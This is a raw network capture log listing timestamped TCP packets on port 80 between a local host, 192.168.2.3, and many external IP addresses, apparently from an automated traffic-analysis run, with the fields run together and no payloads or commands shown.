                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.831254005 CEST4977880192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.970427990 CEST80497775.196.166.214192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.970472097 CEST80497775.196.166.214192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.970556974 CEST4977780192.168.2.35.196.166.214
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.985878944 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.997437000 CEST804977969.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.997518063 CEST4977980192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.004667997 CEST4977980192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.042154074 CEST8049778103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078557014 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078586102 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078600883 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078706980 CEST4977680192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078706980 CEST4977680192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078735113 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.078824043 CEST4977680192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.084029913 CEST8049778103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.084054947 CEST8049778103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.084112883 CEST4977880192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.084114075 CEST4977880192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.088308096 CEST4977880192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.155926943 CEST4978080192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.192826986 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.195256948 CEST804977969.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.196355104 CEST804977969.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.196419954 CEST4977980192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.197169065 CEST804977969.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.197227001 CEST4977980192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.208378077 CEST804975296.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.208457947 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.214253902 CEST4977980192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.214811087 CEST4978280192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.253868103 CEST8049778103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.269926071 CEST804975366.94.119.160192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.270447016 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.275928974 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.275991917 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.279762030 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.279855013 CEST4977680192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.317464113 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.317500114 CEST8049776104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.317584991 CEST4977680192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.317584991 CEST4977680192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.321650982 CEST8049780103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.321777105 CEST4978080192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.322103024 CEST4978080192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.355453968 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.355571032 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.355839014 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.404959917 CEST804977969.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.405222893 CEST804978269.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.405298948 CEST4978280192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.405607939 CEST4978280192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.418776989 CEST4977180192.168.2.3198.100.146.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.518280983 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.529922962 CEST8049780103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533613920 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533648014 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533669949 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533716917 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533766985 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533799887 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533857107 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533890009 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533916950 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.533953905 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.534003019 CEST8049781104.21.79.244192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.534041882 CEST4978180192.168.2.3104.21.79.244
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.556956053 CEST8049780103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.556977034 CEST8049780103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.557018042 CEST4978080192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.557071924 CEST4978080192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.571069956 CEST4978080192.168.2.3103.224.182.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.596304893 CEST804978269.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.597189903 CEST804978269.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.597249985 CEST4978280192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.597980976 CEST804978269.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.598023891 CEST4978280192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.617095947 CEST4978280192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.736809969 CEST8049780103.224.182.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.807719946 CEST804978269.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.062313080 CEST4978380192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.291654110 CEST8049783147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.291816950 CEST4978380192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.292160034 CEST4978380192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.456871986 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.456931114 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.521506071 CEST8049783147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.540585995 CEST8049783147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.540682077 CEST4978380192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.541306973 CEST8049783147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.541429996 CEST4978380192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.731220007 CEST4971580192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.863817930 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:18.073700905 CEST8049766165.227.252.190192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:18.074093103 CEST4976680192.168.2.3165.227.252.190
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:18.080899000 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:18.081001043 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:18.081442118 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:18.298587084 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.202806950 CEST8049746202.254.236.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.202931881 CEST4974680192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361263990 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361288071 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361300945 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361473083 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361484051 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361562014 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361577988 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361592054 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361603975 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361614943 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361614943 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361681938 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361711979 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.361803055 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.578835964 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.578852892 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.579003096 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.579041958 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.586426020 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.586482048 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.586555004 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.586595058 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.601624966 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.601676941 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.601799011 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.601847887 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.616812944 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.616828918 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.616995096 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.632066965 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.632148981 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.632213116 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.632257938 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.647241116 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.647313118 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.647387981 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.647413969 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.653110981 CEST4972980192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.662389040 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.662408113 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.662544012 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.662592888 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.677645922 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.677661896 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.677774906 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.677798033 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.692816019 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.692835093 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.692951918 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.692974091 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.708164930 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.708229065 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.708312988 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.708344936 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.796421051 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.796524048 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.796622992 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.796660900 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.805053949 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.805068970 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.805234909 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.818948984 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.818969011 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.819152117 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.834187984 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.834208012 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.834340096 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.834381104 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.848573923 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.848673105 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.848718882 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.848737955 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.862961054 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.862978935 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.863121986 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.863143921 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.877327919 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.877346992 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.877511978 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.891628981 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.891648054 CEST804978474.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.891757965 CEST4978480192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:20.434412956 CEST4977180192.168.2.3198.100.146.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.040731907 CEST4978580192.168.2.393.187.206.66
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.422940016 CEST804978593.187.206.66192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.423063040 CEST4978580192.168.2.393.187.206.66
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.423402071 CEST4978580192.168.2.393.187.206.66
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.805597067 CEST804978593.187.206.66192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.805802107 CEST804978593.187.206.66192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.805887938 CEST4978580192.168.2.393.187.206.66
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.905355930 CEST4978680192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.906275988 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.906482935 CEST4978780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.908027887 CEST4978980192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.908267021 CEST4979080192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.908338070 CEST4979180192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.908442974 CEST4979280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.908814907 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.909019947 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.909097910 CEST4979580192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.070772886 CEST8049789172.67.208.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.070791006 CEST8049792104.21.46.148192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.071091890 CEST4979280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.071144104 CEST4978980192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.071669102 CEST4979280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.071830034 CEST4978980192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.086169004 CEST8049790192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.086327076 CEST4979080192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.086815119 CEST4979080192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.135862112 CEST804979570.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.136173964 CEST4979580192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.136671066 CEST4979580192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.137871027 CEST804978754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.137986898 CEST4978780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.138258934 CEST4978780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.176215887 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.176331997 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.176599979 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.194539070 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.194665909 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.195225954 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.206372976 CEST804979134.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.206516027 CEST4979180192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.207019091 CEST4979180192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.213952065 CEST804978880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.214117050 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.214576960 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.233994961 CEST8049792104.21.46.148192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.234400034 CEST8049789172.67.208.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.244241953 CEST8049789172.67.208.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.244338989 CEST4978980192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.261452913 CEST8049790192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.261940002 CEST8049790192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.261996031 CEST4979080192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.313210964 CEST4979080192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.319581985 CEST4979680192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.363717079 CEST804979570.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.367358923 CEST804978754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.367521048 CEST4978780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.367688894 CEST804978754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.367769957 CEST4978780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.368725061 CEST4978780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.386574030 CEST4979780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.443357944 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452472925 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452536106 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452549934 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452558994 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452631950 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452666998 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452672958 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452682972 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452692986 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452703953 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452714920 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452724934 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.452824116 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.475163937 CEST804979134.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.475182056 CEST804979134.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.475193024 CEST804979134.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.475296974 CEST4979180192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.476826906 CEST4979180192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.480628014 CEST804979359.106.19.204192.168.2.3
